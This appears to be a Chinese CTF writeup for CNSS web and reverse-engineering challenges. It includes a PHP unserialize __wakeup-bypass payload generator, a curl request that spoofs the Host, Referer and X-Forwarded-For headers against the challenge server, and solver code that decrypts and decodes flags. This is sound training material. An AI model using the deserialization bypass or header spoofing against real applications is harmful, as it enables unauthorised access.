Web [Baby] SignIn 查看源代码,script.js文件中有一段document.getElementById(‘flag’).addEventListener(‘click’, function()下面是一段jsfuck混淆
https://enkhee-osiris.github.io/Decoder-JSFuck/ 得到flag
[Baby] Backdoor post传system()执行系统命令,找到flag
[Baby] Webpack https://www.cnblogs.com/guowenrui/p/17023732.html 参考的这个文章
安装nodejs 用reverse-sourcemap .map文件还原找到flag
[Easy] Leak .swp备份文件 vim -r还原得到flag
[Easy] ezhttp 传参的时候有些问题,像传host还有referer,可能是我这边安装的burp有问题,上网上查了一下发现curl也能传很多参数
1 curl -X CNSS -A "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4313 MMWEBSDK/20220604 Mobile Safari/537.36 MMWEBID/8603 MicroMessenger/8.0.24.2180(0x28001851) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64" -H "Referer: cnss.io" -H "X-Forwarded-For: 127.0.0.1" -H "Host: uestc.edu.cn" -H "Content-Type: application/json" -d "{\"name\": \"nyyyddddn\",\"password\" : \"123456\"}" -b "name=nyyyddddn;password=123456" -u nyyyddddn:123456 http://124.221.34.13:50005/Index
[Easy] ezunserialize 网页上fssmsl那里显示错乱,是因为字符串里有unicode的LRI、PDI、RLO方向控制字符,在ide里面没有这种问题,传参的时候转成url编码再传就行了,只需要把序列化串里声明的属性个数改大(3改成4)绕过__wakeup就拿到flag了
<?php
// Challenge source (the CNSS class) followed by the writeup author's three
// lines that build the serialized value to submit.
// NOTE(review): the unserialize() call that consumes the submitted value is not
// shown here; presumably it sits in the part of the challenge that was not copied.
error_reporting(0);
show_source(__FILE__);
include "flag.php";

class CNSS {
    public $username = 'admin';
    // NOTE(review): the writeup says this literal renders oddly in the browser
    // because of Unicode bidi controls (LRI/PDI/RLO); the text shown here may not
    // be byte-exact. Compare raw bytes, not the rendered string.
    private $i_want2_say = 'fssmsli_like_web';
    protected $password = 'ctf';

    // Runs when an object is rebuilt by unserialize(): overwrites all three
    // properties, so a normally deserialized object can never pass the check
    // in __destruct().
    function __wakeup() {
        $this->username = 'guest';
        $this->i_want2_say = 'i_like_web';
        $this->password = '123456';
        echo "<br/> wake up! <br/>";
    }

    // Prints the flag only if the three properties still hold their declared
    // defaults, i.e. only if __wakeup() did not run.
    function __destruct() {
        echo "destruct<br />";
        if ($this->username === 'admin' && $this->password === 'ctf' && $this->i_want2_say === 'fssmsli_like_web') {
            global $flag;
            echo $flag;
        } else echo "you are 2 baby la<br/>";
    }
}

// Serialize an instance with the default property values.
$aa = new CNSS();
$ss = serialize($aa);
// The serialized header declares 3 properties; bumping the declared count to 4
// makes it disagree with the real number of properties. On old, unpatched PHP
// builds that mismatch causes __wakeup() to be skipped. Defender takeaway:
// __wakeup() is not a validation boundary, and request data should not be
// passed to unserialize() at all.
$ss = str_replace('"CNSS":3', '"CNSS":4', $ss);
// private/protected property names are serialized with NUL bytes around the
// class marker, so the value is URL-encoded to survive transport.
echo urlencode($ss);
Re [Baby] Welcome to Reverse World! main函数那,一打开就有flag了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near Str= byte ptr -40h push rbp mov rbp, rsp sub rsp, 60h call __main lea rax, [rbp+Str] mov rdx, rax lea rcx, Format ; "%s" call scanf lea rax, [rbp+Str] mov rcx, rax ; Str call strlen mov rdx, rax lea rax, [rbp+Str] mov r8, rdx ; Size lea rdx, flag ; "cnss{1t_s3ems_l1ke_Y0u_c4n_us3_IDA_n0w!"... mov rcx, rax ; Buf1 call memcmp test eax, eax jnz short loc_401587
[Baby] Find me 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near push rbp mov rbp, rsp sub rsp, 20h call __main lea rcx, aOopsWhereIsMyF ; "Oops! Where is my flag?" call puts lea rcx, aLearnAboutStri ; "Learn about Strings and you can see the"... call puts lea rcx, aLearnAboutFunc ; "Learn about Functions and you can see t"... call puts lea rcx, aLearnAboutXref ; "Learn about Xref and you can see the th"... call puts lea rcx, aTheLastPartIsI ; "The last part is _ID4_N0w!}" call puts add rsp, 20h pop rbp retn main endp
根据提示,搜字符串cnss{ ,alt+t匹配大小写,找到第一部分cnss{W0w!Y0u’,0
查找函数,发现第二部分是函数名_Comp1et3ly_Uns7and_
交叉引用puts找到第三部分
; Attributes: bp-based frame
; sub736: writes the ten characters 'h','0','w','_','t','0','_','u','s','3'
; one at a time with putchar, then prints the Buffer string with puts and
; returns the constant 1BF52h. Because the text is built from immediates it
; does not show up in a plain strings search; it is found through the xref
; to puts.
public sub736
sub736 proc near
push rbp
mov rbp, rsp
sub rsp, 20h            ; stack space reserved before the calls
mov ecx, 68h ; 'h' ; Character
call putchar
mov ecx, 30h ; '0' ; Character
call putchar
mov ecx, 77h ; 'w' ; Character
call putchar
mov ecx, 5Fh ; '_' ; Character
call putchar
mov ecx, 74h ; 't' ; Character
call putchar
mov ecx, 30h ; '0' ; Character
call putchar
mov ecx, 5Fh ; '_' ; Character
call putchar
mov ecx, 75h ; 'u' ; Character
call putchar
mov ecx, 73h ; 's' ; Character
call putchar
mov ecx, 33h ; '3' ; Character
call putchar
lea rcx, Buffer ; "Find out which function refer to me!"
call puts
mov eax, 1BF52h         ; return value; its meaning is not visible in this listing
add rsp, 20h
pop rbp
retn
拼接获得flag cnss{W0w!Y0u_Comp1et3ly_Uns7and_h0w_t0_us3_ID4_N0w!}
[Easy] 回レ! 雪月花 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 int __cdecl main (int argc, const char **argv, const char **envp) { int i; int j; int k; char v7[40 ]; unsigned __int64 v8; v8 = __readfsqword(0x28 u); puts ("Please input your flag:" ); __isoc99_scanf("%s" , v7); for ( i = 0 ; i <= 31 ; ++i ) v7[i] ^= 0x11 u; for ( j = 0 ; j <= 28 ; ++j ) encode(&v7[j], &v7[j + 1 ], &v7[j + 2 ], &v7[j + 3 ]); for ( k = 0 ; k <= 31 && v7[k] == cipher[k]; ++k ) ; if ( k == 32 ) puts ("Correct!" ); else puts ("Wrong!" ); return 0 ; }
这种逆向题倒过来看会很直观,分三层,把输入的字符串异或上0x11u,然后encode一遍,和cipher判断,一致获得flag
/*
 * Decompiler output of the mixing step applied to a 4-byte window.
 * All four outputs are computed from the ORIGINAL input bytes first and only
 * then written back, so the step can be undone by peeling the XOR chain in
 * reverse order (v8 ^ v7, v7 ^ v6, v6 ^ v5) and re-joining the split bit fields.
 *
 * a1..a4: pointers to the four bytes, updated in place.
 * Returns a4.
 * NOTE(review): the bit-field reading below assumes _BYTE is unsigned, so that
 * >> is a logical shift - confirm against the IDA type definitions.
 */
_BYTE *__fastcall encode(_BYTE *a1, _BYTE *a2, _BYTE *a3, _BYTE *a4)
{
  _BYTE *result;
  char v5;
  char v6;
  char v7;
  char v8;

  /* bit 0 of *a1 goes to bit 7, the upper seven bits of *a2 fill bits 0-6 */
  v5 = (*a1 << 7) | (*a2 >> 1);
  /* upper six bits of *a4 and lower two bits of *a3, then chained with v5 */
  v6 = ((*a4 >> 2) | (*a3 << 6)) ^ v5;
  /* upper seven bits of *a1 and bit 0 of *a2, then chained with v6 */
  v7 = ((*a1 >> 1) | (*a2 << 7)) ^ v6;
  /* upper six bits of *a3 and lower two bits of *a4, then chained with v7 */
  v8 = ((*a3 >> 2) | (*a4 << 6)) ^ v7;
  /* write-back happens only after every output has been computed */
  *a1 = v5;
  *a2 = v6;
  *a3 = v7;
  result = a4;
  *a4 = v8;
  return result;
}
看了半天了不太会,去掉异或之后其他的不知道怎么做了
搜了一下发现这好像是往年题,做法是把异或去掉后,根据a1 a2 a3 a4的顺序倒着做一遍就好了
#include <cstdio>

// Target bytes the binary compares against, followed by a trailing 0.
int c[] = {
    63, 143, 163, 188, 141, 39, 122, 103, 226, 3, 162, 224,
    172, 234, 149, 139, 163, 237, 204, 182, 50, 140, 148, 82,
    130, 138, 20, 198, 245, 174, 104, 115, 0
};

// Inverts the check: undo encode() on every 4-byte window, then undo the
// per-byte XOR with 0x11 (17) and print the 32 recovered characters.
int main() {
    // The binary encoded windows 0..28 in ascending order, so they are
    // decoded from window 28 back down to window 0.
    int start = 28;
    while (start >= 0) {
        int *w = &c[start];

        // Peel the XOR chain from the last output back to the first.
        w[3] ^= w[2];
        w[2] ^= w[1];
        w[1] ^= w[0];

        // Each original byte was split across two outputs; join the halves.
        const int b0 = ((w[2] & 127) << 1) | (w[0] >> 7);
        const int b1 = ((w[0] & 127) << 1) | (w[2] >> 7);
        const int b2 = ((w[3] & 63) << 2) | (w[1] >> 6);
        const int b3 = ((w[1] & 63) << 2) | (w[3] >> 6);

        w[0] = b0;
        w[1] = b1;
        w[2] = b2;
        w[3] = b3;
        --start;
    }

    for (int k = 0; k < 32; ++k) {
        putchar(c[k] ^ 17);
    }
    puts("");
    return 0;
}
[Easy] 邪王真眼 encode每3个字节编码成4个字符,然后还有一个alpha的索引表,应该是替换了索引表的base64
/*
 * Decompiler output of a base64-shaped encoder that looks characters up in the
 * `alpha` table: 3 input bytes become 4 output characters, and short final
 * groups are padded with 61 ('=').
 *
 * a1: input buffer, a2: input length, a3: output buffer,
 * a4: optional out-parameter that receives the output length.
 * Returns 0xFFFFFFFF when a1 is NULL or a2 is 0, otherwise 0.
 * NOTE(review): cmove_bits() is not shown; from its use it presumably extracts
 * or shifts a bit field of the byte - confirm in the binary.
 * NOTE(review): a3 is written without any size argument, so the caller is
 * assumed to provide at least 8 * (a2 + padding) / 6 bytes - confirm.
 */
__int64 __fastcall encode(char *a1, int a2, _BYTE *a3, int *a4)
{
  int v5;
  int v6;
  int v7;
  int v8;
  int v9;
  int i;
  int v12;
  char *v13;

  v13 = a1;
  if ( !a1 || !a2 )
    return 0xFFFFFFFFi64;
  /* v12 = number of bytes missing to reach a multiple of 3 (0, 1 or 2) */
  v12 = 0;
  if ( a2 % 3 )
    v12 = 3 - a2 % 3;
  v9 = a2 + v12;                 /* padded input length */
  v8 = 8 * (a2 + v12) / 6;       /* output length: 4 characters per 3 bytes */
  for ( i = 0; i < v9; i += 3 )
  {
    /* first character: top six bits of byte 0 */
    /* NOTE(review): *v13 is a plain char here; a byte >= 0x80 may index
       differently than in the other lookups, which cast to unsigned - confirm */
    *a3 = alpha[*v13 >> 2];
    if ( a2 + v12 - 3 == i && v12 )
    {
      /* last group and it is short: emit padding */
      if ( v12 == 1 )
      {
        /* two real bytes: three table characters and one '=' */
        v5 = (char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64);
        a3[1] = alpha[v5 + (char)cmove_bits((unsigned __int8)v13[1], 0i64, 4i64)];
        a3[2] = alpha[(char)cmove_bits((unsigned __int8)v13[1], 4i64, 2i64)];
        a3[3] = 61;
      }
      else if ( v12 == 2 )
      {
        /* one real byte: two table characters and two '=' */
        a3[1] = alpha[(char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64)];
        a3[2] = 61;
        a3[3] = 61;
      }
    }
    else
    {
      /* full 3-byte group */
      v6 = (char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64);
      a3[1] = alpha[v6 + (char)cmove_bits((unsigned __int8)v13[1], 0i64, 4i64)];
      v7 = (char)cmove_bits((unsigned __int8)v13[1], 4i64, 2i64);
      a3[2] = alpha[v7 + (char)cmove_bits((unsigned __int8)v13[2], 0i64, 6i64)];
      a3[3] = alpha[v13[2] & 0x3F];   /* last character: low six bits of byte 2 */
    }
    a3 += 4;
    v13 += 3;
  }
  if ( a4 )
    *a4 = v8;
  return 0i64;
}
用这个网站http://web.chacuo.net/netbasex把alpha索引表加上去,解密UR3oWS5E0G03tRibWRrR0cEx拿到flag
[Mid] 恭喜你获得了flag提现机会! ida中patch program修改然后直接call outputflag就拿到flag了
[Mid] Pyfuck 1 2 3 4 5 6 7 8 9 10 x = [~((((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~(((((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~
((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~(((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),~((~((~((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~(((~((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))] flag = input("flag: ") if len(flag) == 31: for i in range(len(flag)): if (ord(flag[i])^((~((~(((-~([]<[]))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))!=x[i]: print("Wrong") exit() print("Correct") else: print("Wrong")
这个挺有意思的[]<[]产生一个0然后用各种位运算。只需要x[]异或上if判断中的
((~((~(((-~([]<[]))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))(算出来是20)然后chr输出就拿到flag了
[Mid] diannaobaozhale 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 main proc near var_5 = byte ptr -5 var_4 = dword ptr -4 ; __unwind { endbr64 push rbp mov rbp, rsp sub rsp, 10h mov [rbp+var_5], 63 mov edi, 63h call _putchar mov edi, 6Eh call _putchar mov edi, 73h call _putchar mov edi, 73h call _putchar mov edi, 7Bh call _putchar mov [rbp+var_4], 0 jmp short loc_11B0 ; --------------------------------------------------------------------------- loc_1194: movsx eax, [rbp+var_5] mov edi, eax ; call _putchar movzx eax, [rbp+var_5] add eax, 2 xor eax, 1 mov [rbp+var_5], al add [rbp+var_4], 1 loc_11B0: cmp [rbp+var_4], 9 jle short loc_1194 mov edi, 7Dh call _putchar mov eax, 0 leave retn ; } main endp
__putchar输出字符
63h 6Eh 73h 73h 7Bh 对应cnss{
cmp [rbp+var_4], 9 jle short loc_1194以及add [rbp+var_4], 1
就是一个九次的循环
7Dh对应 }
#include <cstdio>

// Re-implementation of the disassembled main: prints the fixed prefix, then
// ten generated characters, then the closing brace.
int main() {
    fputs("cnss{", stdout);

    // Mirrors the var_4 counter in the listing: it runs from 0 through 9
    // (cmp ..., 9 / jle), i.e. ten iterations.
    char ch = 'c';
    int remaining = 10;
    while (remaining-- > 0) {
        putchar(ch);
        // add eax, 2 followed by xor eax, 1 in the listing
        ch = static_cast<char>((ch + 2) ^ 1);
    }

    fputs("}\n", stdout);
    return 0;
}
拿到flag cnss{cdghklopst}
[Hard] Shino 的心跳大冒险 玩了一下发现flag被挡住了,看目录里面有好几个Yuri关键词,搜索了一下发现
https://github.com/rinkako/YuriAVGEngine这个项目
看了下简介,这个游戏引擎是基于虚拟机的,有个main.sil是存放游戏逻辑的中间码的,但是被加密了,看起来像base64编码,用在线的base64解码后是乱码
继续翻项目,发现有个yuriricli是用来编译项目的,下载源码看看里面是怎么加密的
using System.Text;

namespace Yuri.YuriInterpreter
{
    // String encrypt/decrypt helpers quoted from the engine's tooling.
    // Both directions use DES with the UTF-8 bytes of `key` as the key and the
    // same hard-coded 8-byte IV; ciphertext is carried as Base64 text.
    // NOTE(review): DES has a 56-bit effective key and the IV is a compile-time
    // constant, so equal inputs under one key give equal outputs. Treat this
    // as obfuscation of script files, not as confidentiality protection.
    public static class YuriEncryptor
    {
        // Encrypts `data` and returns it Base64-encoded.
        // Returns the empty string when `data` is null or empty.
        public static string EncryptString(string data, string key)
        {
            string str = string.Empty;
            if (string.IsNullOrEmpty(data))
            {
                return str;
            }
            MemoryStream ms = new MemoryStream();
            byte[] myKey = Encoding.UTF8.GetBytes(key);
            // fixed IV, identical in DecryptString
            byte[] myIV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
            DES myProvider = new DESCryptoServiceProvider();
            CryptoStream cs = new CryptoStream(ms, myProvider.CreateEncryptor(myKey, myIV), CryptoStreamMode.Write);
            try
            {
                byte[] bs = Encoding.UTF8.GetBytes(data);
                cs.Write(bs, 0, bs.Length);
                // flush the final padded block before reading the buffer
                cs.FlushFinalBlock();
                str = Convert.ToBase64String(ms.ToArray());
            }
            finally
            {
                cs.Close();
                ms.Close();
            }
            return str;
        }

        // Base64-decodes `data`, decrypts it and returns the UTF-8 text.
        // Throws Exception("data is empty") when `data` is null or empty.
        public static string DecryptString(string data, string key)
        {
            string str = string.Empty;
            if (string.IsNullOrEmpty(data))
            {
                throw new Exception("data is empty");
            }
            MemoryStream ms = new MemoryStream();
            byte[] myKey = Encoding.UTF8.GetBytes(key);
            // must match the IV used by EncryptString
            byte[] myIV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
            DES myProvider = new DESCryptoServiceProvider();
            CryptoStream cs = new CryptoStream(ms, myProvider.CreateDecryptor(myKey, myIV), CryptoStreamMode.Write);
            try
            {
                byte[] bs = Convert.FromBase64String(data);
                cs.Write(bs, 0, bs.Length);
                cs.FlushFinalBlock();
                str = Encoding.UTF8.GetString(ms.ToArray());
            }
            finally
            {
                cs.Close();
                ms.Close();
            }
            return str;
        }
    }
}
这个是des加密的,下面还有解密函数,就在窗口load那调用了一下
// Form-load handler used as a throwaway driver: decrypts the scenario file
// line by line with YuriEncryptor.DecryptString and writes the plaintext to
// the console. DecryptString throws on an empty line, which ends the loop.
private void CPMainForm_Load(object sender, EventArgs e)
{
    const string key = "yurayuri";
    string scenarioPath = "D:\\dw_file\\cnss\\CNSS Rev Challenge\\Scenario\\main.sil";

    foreach (string line in File.ReadLines(scenarioPath))
    {
        Console.WriteLine(YuriEncryptor.DecryptString(line, key));
    }
}
解密出来的文本是这样的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 main_0@NOP^^^^main_0@act_bgm#main_1@act_bg#main_2@act_se#main_4@act_dialog#main_6@act_cstand#main_7@act_se#main_9@act_dialog#main_11@act_deletecstand#main_12@act_se#main_14@act_dialog#main_16@act_se#main_18@act_dialog#main_20@act_stopbgm#main_21@act_cstand#main_22@act_se#main_24@act_dialog#main_26@act_bgm#main_27@act_se#main_29@act_dialog#main_31@act_se#main_33@act_dialog#main_35@act_se#main_37@act_dialog#main_39@act_deletecstand#main_40@act_bg#main_41@act_se#main_43@act_dialog#main_45@act_se#main_47@act_dialog#main_49@act_se#main_51@act_dialog#main_53@act_se#main_55@act_dialog#main_57@act_se#main_59@act_dialog#main_61@act_se#main_63@act_dialog#main_65@act_se#main_66@act_bg#main_67@act_wait#main_68@act_bg#main_69@act_cstand#main_71@act_dialog#main_73@act_deletecstand#main_74@act_se#main_75@act_bg#main_76@act_wait#main_77@act_se#main_78@act_bg#main_79@act_wait#main_80@act_bg#main_81@act_stopbgm#main_82@act_cstand#main_83@act_se#main_85@act_dialog#main_87@act_bg#main_88@act_bgm#main_89@act_deletecstand#main_90@act_cstand#main_91@act_se#main_93@act_dialog#main_95@act_se#main_97@act_dialog#main_99@act_se#main_101@act_dialog#main_103@act_se#main_105@act_dialog#main_107@act_se#main_109@act_dialog#main_111@act_se#main_113@act_dialog#main_115@act_se#main_117@act_dialog#main_119@act_se#main_121@act_dialog#main_123@act_se#main_125@act_dialog#main_127@act_se#main_129@act_dialog#main_131@act_deletecstand#main_132@act_picture#main_133@act_se#main_135@act_dialog#main_137@act_se#main_139@act_dialog#main_142@act_dialog#main_144@act_deletepicture#main_145@act_se#main_147@act_dialog#main_150@act_dialog#main_152@act_shutdown^^0^^109097105110 
main_0@act_bgm^filename@050053046109112051#vol@052057056^^main_1@act_bg^^^0^^048045048 main_1@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_2@act_se^^^0^^049045048 main_2@act_se^filename@121117107117109111095048048048049046109112051#vol@056048048^^main_4@act_dialog^^^0^^050045048 main_4@act_dialog^^^main_6@act_cstand^^^0^^083104105110111058227128142230136145229143171032083104105110111239188140230152175228184128229144141229136154229136154229133165229173166231148181229173144231165158230138128229164167229173166231154132232174161231174151230156186229176143231153189227128130227128143013010035048 main_6@act_cstand^id@048#name@083104105110111#face@049#x@049051048#y@049051048#loc@^^main_7@act_se^^^0^^054045048 main_7@act_se^filename@121117107117109111095048048048050046109112051#vol@056048048^^main_9@act_dialog^^^0^^055045048 main_9@act_dialog^^^main_11@act_deletecstand^^^0^^083104105110111058032227128142232191153230152175230136145239188140233149191231155184232141137231142135239188140228189134229175140230156137231165158231167152230132159227128130227128143013010035048 main_11@act_deletecstand^id@048^^main_12@act_se^^^0^^049049045048 main_12@act_se^filename@121117107117109111095048048048051046109112051#vol@056048048^^main_14@act_dialog^^^0^^049050045048 main_14@act_dialog^^^main_16@act_se^^^0^^083104105110111058032227128142231142176229156168230136145230173163231171153229156168230160161233151168229143163227128130228187164228186186229144145229190128231154132229164167229173166231148159230180187230136145230157165229149166239188129227128143013010035048 main_16@act_se^filename@121117107117109111095048048048052046109112051#vol@056048048^^main_18@act_dialog^^^0^^049054045048 main_18@act_dialog^^^main_20@act_stopbgm^^^0^^083104105110111058032227128142231173137231173137239188140233130163230152175228187128228185136239188159227128143013010035048 main_20@act_stopbgm^^^main_21@act_cstand^^^0^^050048045048 
main_21@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_22@act_se^^^0^^050049045048 main_22@act_se^filename@121117107117109111095048048048053046109112051#vol@056048048^^main_24@act_dialog^^^0^^050050045048 main_24@act_dialog^^^main_26@act_bgm^^^0^^083104105110111058032227128142231156139232181183230157165230156137231130185229131143046046046046230136145232135170229183177239188159227128143013010035048 main_26@act_bgm^filename@050057046109112051#vol@053048050^^main_27@act_se^^^0^^050054045048 main_27@act_se^filename@121117107117109111095048048048054046109112051#vol@056048048^^main_29@act_dialog^^^0^^050055045048 main_29@act_dialog^^^main_31@act_se^^^0^^239188159239188159239188159239188154227128142229141131228184135232166129229176143229191131046046046227128143013010035048 main_31@act_se^filename@121117107117109111095048048048055046109112051#vol@056048048^^main_33@act_dialog^^^0^^051049045048 main_33@act_dialog^^^main_35@act_se^^^0^^239188159239188159239188159239188154227128142232191155229133165230160161229155173229144142239188140229143175232131189228188154230156137228184128228184170229165135230128170231154132229165179228186186230137190228184138228189160227128130227128143013010035048 main_35@act_se^filename@121117107117109111095048048048056046109112051#vol@056048048^^main_37@act_dialog^^^0^^051053045048 main_37@act_dialog^^^main_39@act_deletecstand^^^0^^239188159239188159239188159239188154227128142229165185230136180231157128231187191232137178229184189229173144239188140228184128229164180231153189229143145227128130232153189231132182231156139232181183230157165229190136229143175231136177239188140228189134229133182229174158232131140229144142230156137228184128228184170229188186229164167231154132231165158231167152231187132231187135227128130227128143013010035048 main_39@act_deletecstand^id@048^^main_40@act_bg^^^0^^051057045048 
main_40@act_bg^id@049#filename@067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_41@act_se^^^0^^052048045048 main_41@act_se^filename@121117107117109111095048048048057046109112051#vol@056048048^^main_43@act_dialog^^^0^^052049045048 main_43@act_dialog^^^main_45@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180230142165232167166228186134232191153228184170231165158231167152231187132231187135231154132228186186239188140233131189230151160228184128228190139229164150229156176232142183229190151228186134229188186229164167231154132229138155233135143227128130227128143013010035048 main_45@act_se^filename@121117107117109111095048048049048046109112051#vol@056048048^^main_47@act_dialog^^^0^^052053045048 main_47@act_dialog^^^main_49@act_se^^^0^^239188159239188159239188159239188154227128142230184151233128143230181139232175149227128129232189175228187182231160180232167163227128129229188128229143145232191144231187180046046046230149176228184141230184133231154132233171152231171175231165158231167152230138128230156175229156168232191153228184170231187132231187135233135140228187163228187163231155184228188160227128130227128143013010035048 main_49@act_se^filename@121117107117109111095048048049049046109112051#vol@056048048^^main_51@act_dialog^^^0^^052057045048 main_51@act_dialog^^^main_53@act_se^^^0^^239188159239188159239188159239188154227128142229144132231167141229165150233161185229165150233135145227128129228191157231160148229138160229136134227128129229164167229142130111102102101114239188140229133168233131189232162171232191153228184170231187132231187135231154132228186186230143161229156168230137139228184173227128130227128143013010035048 main_53@act_se^filename@121117107117109111095048048049050046109112051#vol@056048048^^main_55@act_dialog^^^0^^053051045048 
